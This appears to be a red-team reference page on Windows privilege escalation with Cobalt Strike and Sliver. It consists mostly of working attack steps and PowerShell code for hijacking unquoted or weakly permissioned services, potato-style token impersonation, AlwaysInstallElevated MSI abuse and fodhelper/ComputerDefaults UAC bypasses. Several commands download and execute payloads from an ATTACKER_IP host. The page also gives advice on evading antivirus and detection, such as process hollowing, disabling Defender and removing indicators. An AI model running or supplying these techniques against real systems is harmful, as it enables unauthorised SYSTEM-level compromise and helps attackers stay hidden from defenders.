Privilege Escalation
Elevating from standard user (medium integrity) to administrator/SYSTEM (high integrity). Only pursue if it enables reaching the objective — priv esc provides defenders with additional detection data points.
OPSEC: Exploiting a priv esc vulnerability is a risk vs reward calculation. Remember the Principle of Least Privilege applies to attackers too — don’t escalate “just because”.
Enumeration
Run automated checks to identify misconfigurations before attempting any exploit.
Cobalt Strike
# SharpUp — audit all checks
beacon> execute-assembly SharpUp.exe audit
# Seatbelt — system and user checks
beacon> execute-assembly Seatbelt.exe -group=system
beacon> execute-assembly Seatbelt.exe -group=user
beacon> execute-assembly Seatbelt.exe -group=all
Sliver
# SharpUp (use -i for inline execution to bypass AppLocker)
sharpup -- audit
execute-assembly -i /path/to/SharpUp.exe audit
# Seatbelt
seatbelt -- -group=all
seatbelt -- -group=user
# PowerUp via SharpSh (AMSI/CLM bypass)
sharpsh -t 40 -- '-u http://ATTACKER_IP/PowerUp.ps1 -c "Invoke-AllChecks"'
# winPEAS (long runtime — better done interactively)
sharpsh -t 400 -- '-u http://ATTACKER_IP/winPEAS.ps1 -c 1'
Manual
# Service enumeration
sc query
Get-Service | fl
# Check current privileges
whoami /all
whoami /priv
# Check registry for autologon creds
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
Unquoted Service Paths
A service binary path that contains spaces and is not wrapped in quotes. When the Service Control Manager starts the service, CreateProcess treats each space as a possible end of the executable name and tries the prefixes in order (C:\Program.exe, then C:\Program Files\Vulnerable.exe, and so on) until one exists. A binary dropped at an earlier candidate path therefore runs instead of the real service, under the service's account (often LocalSystem).
Requirements:
- Unquoted service path with spaces
- Write permission to an earlier directory in the path
- The service runs as a privileged account and can be restarted (or is AUTO_START, so a reboot triggers it)
Note: The payload must be a real service binary (Cobalt Strike's Windows Service EXE artifact, the .svc.exe files in the examples). It has to register with the Service Control Manager via StartServiceCtrlDispatcher and report a running status; a normal EXE is terminated by the SCM once the start timeout expires (error 1053).
Cobalt Strike
# 1. Find unquoted paths
beacon> run wmic service get name, pathname
beacon> execute-assembly SharpUp.exe audit UnquotedServicePath
# 2. Check write permissions on the directory (look for Write/Modify/FullControl granted to Users, Authenticated Users or Everyone)
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services" | fl
# 3. Upload svc payload, named to match the truncated path (e.g. for "...\Vulnerable Services\Service 1.exe", Windows tries "...\Vulnerable Services\Service.exe" before the real binary)
beacon> cd C:\Program Files\Vulnerable Services
beacon> upload C:\Payloads\tcp_local_x64.svc.exe
beacon> mv tcp_local_x64.svc.exe Service.exe
# 4. Restart the service
beacon> run sc stop VulnService
beacon> run sc start VulnService
# 5. Connect to the new beacon
beacon> connect localhost 4444
Warning: Standard users cannot stop/start services by default. Check START_TYPE in the sc qc output: if the service is AUTO_START you may have to wait for a reboot for the payload to run.
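The enumeration behind steps 1 and 2, as an added example that is not code from the original page or from SharpUp: it lists every service whose ImagePath is unquoted and contains spaces, generates the candidate executables Windows would try before the real one, and checks the DACL of each candidate's directory against the SIDs in the current token. It assumes a medium-integrity PowerShell session on the target; service names in the output are whatever the host has. The same Test-PathWritable check works on a service binary itself, which is the question the Weak Service Binary Permissions section asks.

```powershell
# Added example, not from the original page: find unquoted service paths, list the
# executables CreateProcess would try first, and report whether the current token can
# create a file in each of those directories. Run in a medium-integrity PowerShell on
# the target. RunsAs/StartMode show whether the hit is worth pursuing.

function Test-PathWritable {
    param([string]$Path)
    # WriteData (0x2) is the bit needed to create a file in a directory or overwrite a
    # file; GENERIC_WRITE and GENERIC_ALL cover ACEs that were written with generic rights.
    $writeMask = 0x2 -bor 0x40000000 -bor 0x10000000
    $id     = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })

    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    $rules = $acl.GetAccessRules($true, $true, [Security.Principal.SecurityIdentifier])

    $allowed = $false
    foreach ($r in $rules) {
        if ($mySids -notcontains $r.IdentityReference.Value) { continue }
        if (([int]$r.FileSystemRights -band $writeMask) -eq 0) { continue }
        if ($r.AccessControlType -eq 'Deny') { return $false }   # an explicit deny wins
        $allowed = $true
    }
    return $allowed
}

function Get-UnquotedServicePath {
    $services = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^\s*"' }

    foreach ($svc in $services) {
        # Keep only the executable part (up to the first .exe); the rest are arguments.
        $m = [regex]::Match($svc.PathName, '^(.*?\.exe)', 'IgnoreCase')
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { continue }                     # no space: nothing to truncate
        if ($exe -match '^[A-Za-z]:\\Windows\\') { continue }    # %SystemRoot% is not user-writable

        # CreateProcess tries each space-delimited prefix, with .exe appended, in order.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate
            if (-not (Test-Path -LiteralPath $dir)) { continue }
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                ImagePath = $exe
                Candidate = $candidate
                Writable  = Test-PathWritable -Path $dir
            }
        }
    }
}

# Show only the hits worth acting on
Get-UnquotedServicePath | Where-Object { $_.Writable } | Format-Table -AutoSize
```

The ACL comparison is deliberately used instead of writing a probe file: it answers the same question without creating file events in the target directory. A hit with RunsAs = LocalSystem and StartMode = Auto is the one to use when you cannot restart the service yourself.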
Weak Service Permissions
The service object itself (not its binary) has a weak DACL, e.g. SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS granted to Users or Authenticated Users, so we can repoint its binPath= at our payload.
Cobalt Strike
# 1. Find modifiable services
beacon> execute-assembly SharpUp.exe audit ModifiableServices
# 2. Check current config
beacon> run sc qc VulnService
# 3. Upload svc payload (upload writes to beacon's current directory, assumed to be C:\Temp here) and point the service at it
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> run sc config VulnService binPath= C:\Temp\tcp-local_x64.svc.exe
# 4. Restart service
beacon> run sc stop VulnService
beacon> run sc start VulnService
# 5. Connect
beacon> connect localhost 4444
# 6. Restore the original path (the escaped quotes are required because the real path contains spaces)
beacon> run sc config VulnService binPath= \"C:\Program Files\Vulnerable Services\Service.exe\"
Note: The space after binPath= is intentional; sc config requires every option in the form option= value.
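The check behind this section and the Sliver modifiable-service procedure further down, as an added example that is not code from the original page or from SharpUp: it reads each service's security descriptor with sc.exe sdshow, parses the SDDL with the .NET RawSecurityDescriptor class, and reports the allow ACEs that give the current token SERVICE_CHANGE_CONFIG (the right sc config binPath= needs), WRITE_DAC, WRITE_OWNER or generic write/all. It assumes a medium-integrity PowerShell session on the target; the access-mask constants are from winsvc.h.

```powershell
# Added example, not from the original page: report services whose DACL lets the current
# token reconfigure them, rewrite their DACL/owner, or holds generic write/all.
# Run in a medium-integrity PowerShell on the target. Pass -Name to limit the sweep: the
# default runs sc.exe once per installed service, which is noisy.

# Service access bits from winsvc.h plus the standard and generic rights that imply them.
$SvcRight = @{
    ChangeConfig = 0x00000002   # SERVICE_CHANGE_CONFIG: sc config binPath= ...
    Start        = 0x00000010   # SERVICE_START
    Stop         = 0x00000020   # SERVICE_STOP
    WriteDac     = 0x00040000   # WRITE_DAC
    WriteOwner   = 0x00080000   # WRITE_OWNER
    GenericWrite = 0x40000000   # GENERIC_WRITE (maps onto SERVICE_CHANGE_CONFIG)
    GenericAll   = 0x10000000   # GENERIC_ALL
    AllAccess    = 0x000F01FF   # SERVICE_ALL_ACCESS
}

function Get-ServiceDaclWeakness {
    param([string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name))

    $id     = [Security.Principal.WindowsIdentity]::GetCurrent()
    $mySids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    $takeover = $SvcRight.ChangeConfig -bor $SvcRight.WriteDac -bor $SvcRight.WriteOwner -bor $SvcRight.GenericWrite -bor $SvcRight.GenericAll
    $restart  = $SvcRight.Start -bor $SvcRight.Stop

    foreach ($n in $Name) {
        # sc sdshow prints a blank line followed by the SDDL string (D:... and optionally S:...)
        $sddl = & sc.exe sdshow $n 2>$null | Where-Object { $_ -match '^\s*D:' } | Select-Object -First 1
        if (-not $sddl) { continue }
        $sd = New-Object Security.AccessControl.RawSecurityDescriptor($sddl.Trim())

        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [Security.AccessControl.CommonAce]) { continue }
            if ($ace.AceType -ne [Security.AccessControl.AceType]::AccessAllowed) { continue }
            if ($mySids -notcontains $ace.SecurityIdentifier.Value) { continue }
            $mask = $ace.AccessMask
            if (($mask -band $takeover) -eq 0) { continue }

            $who = $ace.SecurityIdentifier.Value
            try { $who = $ace.SecurityIdentifier.Translate([Security.Principal.NTAccount]).Value } catch {}
            $rights = foreach ($k in $SvcRight.Keys) { if (($mask -band $SvcRight[$k]) -eq $SvcRight[$k]) { $k } }

            [pscustomobject]@{
                Service    = $n
                Principal  = $who
                Rights     = ($rights | Sort-Object) -join ','
                CanRestart = (($mask -band $restart) -eq $restart)   # otherwise wait for a reboot
            }
        }
    }
}

Get-ServiceDaclWeakness | Format-Table -AutoSize
```

CanRestart tells you up front whether the sc stop/sc start steps will work from this token; without SERVICE_START and SERVICE_STOP the reconfigured binPath= only runs at the next boot (or when another principal restarts the service).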
Weak Service Binary Permissions
The service binary file itself has weak permissions (e.g. BUILTIN\Users Allow Modify), so we can replace it directly.
Cobalt Strike
# 1. Check binary permissions (SharpUp audit ModifiableServiceBinaries lists these as well)
beacon> powershell Get-Acl -Path "C:\Program Files\Vulnerable Services\Service.exe" | fl
# 2. Stop the service (binary is locked while running)
beacon> run sc stop VulnService
# 3. Upload the replacement under the same filename (keep a copy of the original to restore later; the payload must itself be a service binary, see the note above)
beacon> upload C:\Payloads\Service.exe
# 4. Start service
beacon> run sc start VulnService
beacon> connect localhost 4444
Modifiable Service (Sliver)
Abuse a modifiable service to add a domain user to local admins.
Sliver
# 1. Check service config (keep the BINARY_PATH_NAME and START_TYPE output so they can be restored afterwards)
execute -o sc qc SERVICENAME
# 2. Reconfigure to add user to local admins (the command runs as SYSTEM when the service starts)
execute -o sc config SERVICENAME binPath= "net localgroup Administrators DOMAIN\\user /add" obj= "NT AUTHORITY\\SYSTEM"
execute -o sc config SERVICENAME start= auto
# 3. Verify and trigger (sc start reports error 1053 because net.exe never talks to the SCM, but by then the command has already run)
execute -o sc qc SERVICENAME
execute -o sc start SERVICENAME
# 4. Confirm
execute -o net localgroup administrators
SeImpersonatePrivilege
Abuses SeImpersonatePrivilege (commonly held by service accounts, e.g. IIS application pools and SQL Server) to coerce a SYSTEM process into authenticating to us and then impersonate that token, i.e. the potato family of attacks. Confirm the privilege with whoami /priv first.
Sliver
# SweetPotato via execute-assembly (default method)
execute-assembly /path/to/SweetPotato.exe -p C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -a "-ep bypass -nop iex (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/payload.txt')"
# SweetPotato with EfsRpc fallback (if default fails)
execute-assembly /path/to/SweetPotato.exe -e EfsRpc -p C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -a "-ep bypass -nop iex (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/payload.txt')"
# Alternative: donut shellcode injection into a sacrificial process
donut -i /path/to/SweetPotato.exe -a 2 -b 2 -p "-p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a \"IEX((new-object net.webclient).downloadstring('http://ATTACKER_IP/payload.txt'))\"" -o SweetPotato.bin
# Launch sacrificial process and inject
execute notepad
ps -e notepad
execute-shellcode -S -r -I 30 -p <PID> /path/to/SweetPotato.bin
Note: After getting a SYSTEM shell via SweetPotato, spawn a fresh implant via process hollowing (hollow svchost.exe) and work from that one; the initial shell may be killed by AV.
AlwaysInstallElevated
When the AlwaysInstallElevated DWORD is set to 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, any user can install MSI packages and the installer runs them as SYSTEM. Both values must be set; one on its own is not exploitable. SharpUp audit reports this as AlwaysInstallElevated.
Sliver
# 1. Install wixl (on attacker machine)
sudo apt install wixl
# 2. Clone the MSI template repo
git clone https://github.com/KINGSABRI/MSI-AlwaysInstallElevated
cd MSI-AlwaysInstallElevated
# 3. Copy your payload into the directory
cp /path/to/payload.exe .
# 4. Edit WXS-Templates/alwaysInstallElevated-3.wxs — update the Source attribute:
# <File Id="File0" Name="setup.exe" Source="payload.exe" />
# 5. Compile the MSI
wixl -v WXS-Templates/alwaysInstallElevated-3.wxs -o alwaysInstallElevated.msi
# 6. Host and execute on target (runs as SYSTEM)
execute -t 40 -o msiexec /qn /i http://ATTACKER_IP/alwaysInstallElevated.msi
UAC Bypass
UAC runs an administrator's processes at medium integrity with a filtered token and prompts for consent before anything runs at high integrity. A bypass gets from that medium-integrity admin context to high integrity without the prompt. It does nothing for a user who is not in the local Administrators group, and most bypasses fail when UAC is set to Always notify.
Cobalt Strike
# ElevateKit — load elevate.cna into CS via Cobalt Strike > Scripts > Load
# List available elevators
beacon> elevate
beacon> runasadmin
# Spawn elevated session
beacon> elevate <exploit_name> <listener>
beacon> runasadmin <elevator> <command>
Sliver
Fodhelper — fodhelper.exe is a signed auto-elevating binary that launches the ms-settings: protocol handler; the handler is resolved from HKCU first, so a user-writable key hijacks the command it runs at high integrity:
# 1. Create registry keys (run through execute -o powershell, as in step 2)
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (iwr http://ATTACKER_IP/payload.txt -usebasicparsing) | IEX" -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
# 2. Trigger
execute -o powershell 'Start-Process "C:\Windows\System32\fodhelper.exe"'
# 3. Verify and get SYSTEM
sa-whoami
getsystem
ComputerDefaults — similar technique using ComputerDefaults.exe, another auto-elevating binary that resolves the same ms-settings handler:
# 1. Create registry keys
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
# 2. Set payload command
execute -o powershell 'Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "C:\Windows\System32\cmd.exe /c powershell -enc <BASE64_PAYLOAD>" -Force'
# 3. Trigger
execute -o powershell 'Start-Process "C:\Windows\System32\ComputerDefaults.exe"'
# 4. Verify
sa-whoami
getsystem
Tip: Disable Defender before running getsystem if possible. Remove HKCU:\Software\Classes\ms-settings afterwards; the hijack key is a well-known indicator and would fire again on the next ms-settings: launch.
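The Fodhelper and ComputerDefaults procedures above as one function, as an added example that is not code from the original page: it runs the preflight checks the technique silently assumes (the user is in local Administrators but the token is filtered, UAC is on, and it is not set to Always notify), writes the ms-settings hijack, triggers the chosen auto-elevating binary, and removes the key in a finally block. It assumes a medium-integrity PowerShell session (execute -o powershell or an interactive PS); the function names and the payload string are placeholders.

```powershell
# Added example, not from the original page: the ms-settings registry hijack behind the
# fodhelper.exe and ComputerDefaults.exe bypasses, with preflight checks and cleanup.
# Run from the medium-integrity implant. $Command and -Trigger are parameters; the
# payload command line in the usage block is a placeholder.

function Test-UacBypassPreconditions {
    # Auto-elevation only helps a user who is in the local Administrators group but is
    # running with a filtered token, and only when UAC is not on "Always notify"
    # (ConsentPromptBehaviorAdmin = 2).
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    # In a filtered token Administrators appears as "Group used for deny only", so test the
    # SID from whoami; WindowsIdentity.Groups drops deny-only entries.
    $inAdmins   = [bool]($groups | Where-Object { $_.SID -eq 'S-1-5-32-544' })
    $principal  = New-Object Security.Principal.WindowsPrincipal(
                      [Security.Principal.WindowsIdentity]::GetCurrent())
    $isElevated = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
    $policy = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

    [pscustomobject]@{
        InAdministrators      = $inAdmins
        AlreadyHighIntegrity  = $isElevated
        EnableLUA             = $policy.EnableLUA
        ConsentPromptBehavior = $policy.ConsentPromptBehaviorAdmin
        Viable                = ($inAdmins -and -not $isElevated -and
                                 $policy.EnableLUA -eq 1 -and $policy.ConsentPromptBehaviorAdmin -ne 2)
    }
}

function Invoke-MsSettingsHijack {
    param(
        [Parameter(Mandatory)][string]$Command,
        [ValidateSet('fodhelper.exe', 'ComputerDefaults.exe')][string]$Trigger = 'fodhelper.exe',
        [int]$WaitSeconds = 5
    )
    $key = 'HKCU:\Software\Classes\ms-settings\shell\open\command'
    try {
        New-Item -Path $key -Force | Out-Null
        # An empty DelegateExecute makes the shell run the (default) command line directly
        # instead of the COM handler; the auto-elevated binary then executes $Command at
        # high integrity.
        New-ItemProperty -Path $key -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
        Set-ItemProperty -Path $key -Name '(default)' -Value $Command
        Start-Process -FilePath (Join-Path $env:SystemRoot "System32\$Trigger") -WindowStyle Hidden
        Start-Sleep -Seconds $WaitSeconds   # let the trigger read the key before it is removed
    }
    finally {
        # Remove the whole hijack key: it is a well-known indicator and would fire again on
        # the next ms-settings: launch.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Usage (placeholder payload): check first, then fire. Inspect $pre when it is not viable.
$pre = Test-UacBypassPreconditions
if ($pre.Viable) {
    Invoke-MsSettingsHijack -Trigger 'ComputerDefaults.exe' `
        -Command 'C:\Windows\System32\cmd.exe /c powershell -nop -w hidden -enc <BASE64_PAYLOAD>'
} else { $pre }
```

The new high-integrity process is what the page's sa-whoami / getsystem steps then operate on; the key is removed whether or not the trigger succeeded, so a failed attempt leaves nothing behind except the process-creation events for the trigger binary.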